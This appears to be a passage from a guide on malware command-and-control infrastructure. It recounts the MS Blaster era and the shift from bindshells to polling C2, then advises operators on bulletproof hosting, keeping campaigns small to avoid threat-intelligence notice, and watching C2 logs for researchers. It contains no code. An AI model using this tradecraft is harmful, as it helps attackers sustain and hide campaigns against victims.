With the proliferation of connection firewalling techniques (hard/soft), data filtering, and government mandates, management of compromised devices forced campaign tactics to shift towards an indirect method of communications with their code. Operating system vendors getting their products owned with remotely-exploitable code listening on all devices by default, leading way to massive worms which lead to wide internet outages and even outright network destruction in the worst cases forced them to take serious looks at security. “Bindshell” is an archaic relic of times past.
Malware authors would frequently demonstrate, or use, “bindshell” payloads to offer operational functionality post-exploitation. It was the guarantee of an exploit’s success and appeared as a finish line concluding a successful exploitation exercise. Several critical vulnerabilities and their resulting automated exploitation via worms and aggressive scanners would conclude this technique in the chapters of hacker history.
The MS Blaster (DCOM) vulnerability found and demonstrated publicly by the LSD group out of Poland lead to, perhaps, the most lucrative environment the world has ever publicly seen (and may see ever) in the entirety of the internet’s existence (counting per capita connected machines during the time period).
Practically every NT-based operating system connected to a network was exploitable up to the latest Windows XP (SP1) version at that time.
Many ISPs and institutions around the world had open network policy. The landscape was littered with NetBIOS-accessible machines in the hundreds of millions across the Internet. It was a slaughterhouse as even power plants (East Coast USA) were probably affected by these attacks.
The panacea was the abrupt closure of ALL ports for client’s public and private IP addresses in many ISP gardens. Organizations were rapidly pushing restrictive firewall policy for internal and external network segments. Many had to learn the lesson the hard way.
It was both a joyous time for hackers and a solemn moment as everyone realized things would never be the same after this.
Microsoft policy, always placing security an afterthought of the software creation process, changed overnight, acknowledging the company’s role in proactively debugging their code to prevent worldwide device compromise.
No longer would your SubSeven or BO backdoor work. The game was raised. Malware authors had to change their tactics at a basic design level. Calling into a target’s network was no longer an option for most operations.
As with most other applications, they begun to rely on polling to keep updates and issue commands.
C2 management is often powered by a traditional web stack:
- HTTP Server
- (Optional) Load Balancer(s)
(Optional) Content Delivery Network(s)
- (Optional) Redirector(s)
- DB Mechanism
Does not always have to be a server, although it probably should
How these are designed, configured, deployed, and protected are up to the operation’s infrastructure leader(s), ideally with input from those with a significant background in systems administration and networking.
For a sophisticated group with plans of multiple extended campaigns during their existence it’s better to have significant resources spent on building out and maintaining this infrastructure.
There are cases in which an attacker may use a barebones infrastructure. Standalone or all-in-one C2 packages are rarely seen in the wild.
In cases of a solo adventure, it is still best to separate your infrastructure as much as possible. CI/CD methodology has come a long way since the early 2000s and continues to improve. With proper scripting experience a single programmer can manage quite an infrastructure. Maintaining relationships with the proper “bullethost” providers becomes the harder problem to solve.
One must take into account the OpSec needed for any operations carried out via this infrastructure. Proper documentation and monitoring of this infrastructure is needed if one is forgetful. In the case of teams, it is imperative to have this information ready for anyone who needs to know.
One must also take into account threat information shared among the defensive community. Threat Intelligence feeds often provide information about various campaigns that researchers and vendors have come across in an efforts to increase their reputation along with interest in the products. By limiting your campaign activities to the fewest targets possible you can minimize your exposure to such organizations. Despite the utmost care,
your activities always have a possibility of exposure. Thus, if possible, always routinely search for certain targets showing up in public news or search engine sources.
The more advanced organizations may have access to defensive teams subscribed to commercial, public, or private threat sharing information sources. These can prove invaluable for protecting the unit as a whole.
Log management, as with any well-monitored service, is a key responsibility. This is the more important task if you do not have the resources to monitor both Threat Intelligence feeds and logs of your servers. A paranoid malware author will have mechanisms in place to detect odd traffic patterns in C2 logs:
Headers not normally seen
HTTP verbs that are not used (not counting GET)
HTTP variables that are not used (any verbs which accept arbitrary input)
Non-HTTP compliant traffic to HTTP services
Repeat the logic as necessary for whichever protocol you use for C2 communications. Due to current firewall policies across nations and organizations, HTTP(S) is used for most communication in some form. As the internet changes the underlying principles will not change.